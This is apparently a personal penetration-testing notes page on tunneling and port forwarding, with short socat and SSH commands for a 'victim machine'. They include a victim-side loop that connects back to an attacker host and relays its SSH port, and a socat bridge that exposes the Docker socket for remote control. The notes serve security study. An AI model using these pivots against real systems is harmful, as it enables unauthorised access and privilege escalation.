<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Tunneling</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Tunneling</h1>

      <div class="ck-content">
        <p><a href="https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding">https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding</a> </p>
        <p>To find running services on the victim machine, run <code>ss -tulwn</code>

        </p>
        <p>For forwarding an internal port to externel connection, 90% of what normally
          is needed, do this</p><pre><code class="language-text-plain">./socat tcp-l:2222,fork,reuseaddr tcp:127.0.0.1:3306</code></pre>

        <p><code>socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT</code>

        </p>
        <p>If you are not familiar with <code>socat</code>, the options that we used
          are:</p>
        <ul>
          <li><code>-d -d</code> provides some debugging data (fatal, error, warning,
            and notice messages)</li>
          <li><code>OPENSSL-LISTEN:PORT_NUM</code> indicates that the connection will
            be encrypted using OPENSSL</li>
          <li><code>cert=PEM_FILE</code> provides the PEM file (certificate and private
            key) to establish the encrypted connection</li>
          <li><code>verify=0</code> disables checking peer’s certificate</li>
          <li><code>fork</code> creates a sub-process to handle each new connection.</li>
        </ul>
        <p>For forwarding a local port use 
          <br /><code>socat tcp-l:2222,fork,reuseaddr tcp:10.17.17.11:22</code>

        </p><pre><code class="language-text-plain">attacker&gt; socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost 

victim&gt; while true; do socat TCP4:10.17.17.11:443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22 

attacker&gt; ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim</code></pre>

        <p>We can see that a service running on port 10000 is blocked via a firewall
          rule from the outside (we can see this from the IPtable list). However,
          Using an SSH Tunnel we can expose the port to us (locally)!</p>
        <p>From our local machine, run <strong>ssh -L 10000:localhost:10000 &lt;username&gt;@&lt;ip&gt;</strong>

        </p>
        <p><strong> ss -tulpn shows local services connected to the victim machine</strong>

          <br
          /><code># on target machine</code>

          <br /><code># get a port to communicate with the socket file</code>

          <br /><code>socat tcp-l:3275,fork,reuseaddr unix-connect:/var/run/docker.sock &amp;!</code>

          <br
          />
          <br />
          <br /><code># on your system</code>

          <br /><code># use docker</code>

          <br /><code>docker -H :3275 ...</code>

        </p>
      </div>
    </div>
  </body>

</html>